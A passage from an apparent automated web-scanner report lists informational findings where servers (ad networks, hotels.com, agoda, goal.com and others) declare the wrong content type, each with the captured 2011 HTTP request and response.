Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:03 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 12893

document.write('<style type="text/css"> div#p360-hybrid120x600aquanotch-F09A1BDE-D4D2-11E0-99F0-875B91016B62 { width: 120px; left: 0; font-family: sans-serif; position: relative; display
...[SNIP]...
28.21. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-0666653885873574%26output%3Dhtml%26h%3D250%26slotname%3D7372794801%26w%3D300%26ea%3D0%26flash%3D10.3.183%26url%3Dhttp%253A%252F%252Fads.pubmatic.com%252Fhosteddefaulttags%252F26620%252F26621%252F21556%252F559%252Fadtag.html%26dt%3D1317606797018%26bpp%3D7%26shv%3Dr20110921%26jsv%3Dr20110914%26correlator%3D1317606797027%26frm%3D8%26adk%3D4114293891%26ga_vid%3D1069027809.1317606797%26ga_sid%3D1317606797%26ga_hid%3D1887245699%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D8%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D23%26u_nmime%3D106%26dff%3Dtimes%2520new%2520roman%26dfs%3D16%26adx%3D0%26ady%3D0%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D2019610879%26loc%3Dhttp%253A%252F%252Fads.pubmatic.com%252FHostedDefaultTags%252F26620%252F26621%252F21556%252F559%252Fadtag.html%26prodhost%3Dgoogleads.g.doubleclick.net%26fu%3D0%26ifi%3D1%26dtd%3D12&uid=eaa3bCBGoZRHY9Na_666924&xy=0%2C0&wh=300%2C250&vchannel=117962&iad=1317606801324-71110734669491650&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4248078B31C79B97218C3D4E49B5174D; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 03 Oct 2011 01:53:15 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("eaa3bCBGoZRHY9Na_666924");
28.22. http://expedia-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://expedia-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=expedia&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: expedia-www.baynote.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:14:16 GMT
Content-Length: 80021


                           baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...
28.23. http://hublotnation.com/wp/wp-admin/admin-ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hublotnation.com
Path:   /wp/wp-admin/admin-ajax.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
Content-Length: 27
Origin: http://hublotnation.com
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
accept: */*
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; base_domain_50c378d8154db3a16aee8f1a8bb76f49=hublotnation.com; fbsetting_50c378d8154db3a16aee8f1a8bb76f49=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.4.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

action=stc_comm_get_display

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:05:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:05:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 1
Content-Type: text/html; charset=UTF-8

0
28.24. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hublotnation.com
Path:   /wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 455
Content-Type: text/html

<!-- socials postings -->
<dl id="socials-postings">
   <dt><label for="post-to-facebook">Post to my facebook</label><input type="checkbox" id="post-to-facebook" /></dt>
   <dt><label for="post-to-twitter
...[SNIP]...
28.25. http://i1.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i1.goal.com
Path:   /files/images/stats/goal/team-logos/7/97_20x20.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /files/images/stats/goal/team-logos/7/97_20x20.jpg HTTP/1.1
Host: i1.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=176400
Content-Type: image/jpeg
Date: Sun, 02 Oct 2011 23:50:25 GMT
Expires: Wed, 05 Oct 2011 00:50:25 GMT
Last-Modified: Fri, 30 Sep 2011 23:04:22 GMT
Server: ECS (sjo/522D)
X-Cache: HIT
Content-Length: 1111

GIF87a........"...T.^.....V...t.B..v.....:$.....l.......n.....N.....r.....Z...$.......~D....>.....J.........$....N..b...t....z.....^..~T..L.^..B.....f.....2.....~T.......R..R...\.6..V,.:..:...........
...[SNIP]...
28.26. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i2.goal.com
Path:   /files/images/stats/goal/team-logos/7/97_20x20.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /files/images/stats/goal/team-logos/7/97_20x20.jpg HTTP/1.1
Host: i2.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=176400
Content-Type: image/jpeg
Date: Sun, 02 Oct 2011 23:50:24 GMT
Expires: Wed, 05 Oct 2011 00:50:24 GMT
Last-Modified: Fri, 30 Sep 2011 23:04:22 GMT
Server: ECS (sjo/522D)
X-Cache: HIT
Content-Length: 1111

GIF87a........"...T.^.....V...t.B..v.....:$.....l.......n.....N.....r.....Z...$.......~D....>.....J.........$....N..b...t....z.....^..~T..L.^..B.....f.....2.....~T.......R..R...\.6..V,.:..:...........
...[SNIP]...
28.27. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_48x48.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i2.goal.com
Path:   /files/images/stats/goal/team-logos/7/97_48x48.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /files/images/stats/goal/team-logos/7/97_48x48.jpg HTTP/1.1
Host: i2.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=176400
Content-Type: image/jpeg
Date: Sun, 02 Oct 2011 23:50:24 GMT
Expires: Wed, 05 Oct 2011 00:50:24 GMT
Last-Modified: Fri, 30 Sep 2011 23:04:22 GMT
Server: ECS (sjo/5239)
X-Cache: HIT
Content-Length: 2259

GIF87a0.0....dJ....dR.....P......t.p.tn...y.p.....9.tnL....N.........D....p...g....`..p..~.................R............4.".........L..h.`.....J........^.....n...."..N.d^\.y.....p...$.h..............
...[SNIP]...
28.28. http://i2.goal.com/files/images/stats/goal/team-logos/8/98_20x20.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i2.goal.com
Path:   /files/images/stats/goal/team-logos/8/98_20x20.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /files/images/stats/goal/team-logos/8/98_20x20.jpg HTTP/1.1
Host: i2.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=176400
Content-Type: image/jpeg
Date: Sun, 02 Oct 2011 23:50:24 GMT
Expires: Wed, 05 Oct 2011 00:50:24 GMT
Last-Modified: Fri, 30 Sep 2011 23:00:26 GMT
Server: ECS (sjo/522C)
X-Cache: HIT
Content-Length: 1065

GIF87a.......,ZTL......:<....bdD...nL...l...........|...j4<....4......t..$.|.zt.......nt............\...JLtzt....~|....JLL...NL...d..l...z|.v|......\........D.........v|...L......fd......L.....4.|....
...[SNIP]...
28.29. http://img.agoda.net/images/default/bg_tthome.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.agoda.net
Path:   /images/default/bg_tthome.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/default/bg_tthome.gif HTTP/1.1
Host: img.agoda.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Type: image/gif
Last-Modified: Mon, 08 Nov 2010 10:06:21 GMT
Accept-Ranges: bytes
ETag: "8ad1ec972c7fcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:38:07 GMT
Connection: keep-alive
Content-Length: 106

.PNG
.
...IHDR......."......-.....1IDATx..... .....l.BTu
../.X....mH2..A.#..02..$..,u....*.....IEND.B`.
28.30. http://img.agoda.net/images/default/google_search.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.agoda.net
Path:   /images/default/google_search.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/default/google_search.gif HTTP/1.1
Host: img.agoda.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 24 Feb 2011 07:08:02 GMT
Accept-Ranges: bytes
ETag: "0752d93f1d3cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: Keep-Alive
Date: Mon, 03 Oct 2011 00:37:38 GMT
Age: 1277
Content-Length: 717

.PNG
.
...IHDR...w...........3.....IDATx...]k.0....H.
...M......6....l...+....@].u.Q4...g]:.88(..}.s.>..,.V...2.,/(u]g.[f?....jEi.R~,...OG.|^z.K.pG.../.j....%..:......q>.}.~5.b..|...i]RU..[.e'..(Z
...[SNIP]...
28.31. http://img.agoda.net/images/default/mouse_overbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.agoda.net
Path:   /images/default/mouse_overbg.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/default/mouse_overbg.gif HTTP/1.1
Host: img.agoda.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Type: image/gif
Last-Modified: Mon, 06 Jun 2011 06:27:36 GMT
Accept-Ranges: bytes
ETag: "0bc4dd31224cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:38:07 GMT
Connection: keep-alive
Content-Length: 114

.PNG
.
...IHDR...............t....9IDATx.}.7..0..0...VoN........v....nTU(3QD wGf.T... fF......u.........IEND.B`.
28.32. http://ipinvite.iperceptions.com/Invitations/Javascripts/customInvites.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ipinvite.iperceptions.com
Path:   /Invitations/Javascripts/customInvites.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Invitations/Javascripts/customInvites.aspx?sid=910 HTTP/1.1
Host: ipinvite.iperceptions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Mon, 03 Oct 2011 00:08:03 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-by: INVSVR11
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 351

var _http = document.location.protocol;var gLink = _http +'//ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_910.js';var script = document.createElement('script'); script.setA
...[SNIP]...
28.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:28 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:00:28 GMT
Pragma: no-cache
Content-Length: 538
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAY
...[SNIP]...
28.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:10 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 00:09:10 GMT
Pragma: no-cache
Content-Length: 536
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYS
...[SNIP]...
